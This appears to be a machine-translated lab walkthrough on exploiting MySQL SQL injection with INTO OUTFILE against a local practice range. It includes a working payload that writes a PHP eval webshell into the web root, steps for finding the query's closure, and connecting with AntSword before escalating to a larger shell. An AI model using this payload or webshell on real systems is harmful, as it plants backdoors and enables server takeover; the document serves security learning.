Table of contents
First, mysql file upload points
Second, the file upload command
1. Determine the injection method
2. Test the closing method of the target website:
3. Write a sentence Trojan horse
First, mysql file upload points
1, show variables like '%secure%'; used to check whether mysql has permission to read and write files
2. The file permission of the database specifies whether the database user has permission to write and read existing permissions in the operating system
3. The environment used by the into outfile command: You must know one, the full path of the folder on the server where files can be written
Second, the file upload command
In fact, our ultimate goal is to upload a one-sentence Trojan horse to the target shooting range, or a php file that we want to upload.
Usage for file upload:
(1) It can be written directly under the directory of the website, and then it can be directly connected as a one-sentence Trojan horse
(2) It is found that the target website contains files, and at the same time, the database has the permission to write a one-sentence Trojan horse for use
one word trojan horse
?id=-1')) union select 1,2,"<?php @eval($_POST['hyc']); ?>" into outfile "D:\\phpstudy_pro\\WWW\\hyc.php" --+
<?php @eval($_POST['password']);?>: one sentence Trojan horse
password is the reserved password, the password given here is hyc
D:\\phpstudy_pro\\WWW\\ is the file path
hyc.php is the newly inserted file name
Three, examples
1. Determine the injection method
When we pass the value into it, it will prompt...outfile, indicating that file upload injection can be used
2. Test the closing method of the target website:
But the content of the error report does not show where the error is reported
So we use --+ to see if it is the closed mode, the error shown in the figure below remains unchanged, so the closed mode is not'
So we will conduct a more detailed test:
When we try ')) it works fine
Of course, there may be some coincidences in the trial process, such as using " to get the same result.
is because the correct answer ')) is closed in a way that invalidates "
How to solve it?
We can test with and 1=1 and and 1=2
Double quote test:
The two results are the same, indicating that "is not the correct result.
Single quote and double bracket test:
The two results are different, "wrong is wrong", so we found the correct way to close.
Number of test columns
3. Write a sentence Trojan horse
You can see the written Trojan under the target path:
Open it to see what is written inside:
4. Take Control
Use the ant sword to connect to the target shooting range:
After obtaining the right to use the computer, the injection goal is achieved: 
You can also use whoami to see Xiaopi's permissions here. I gave ordinary user permissions, not administrator permissions.
Next, you can upload to Malaysia and bounce back to get the web shell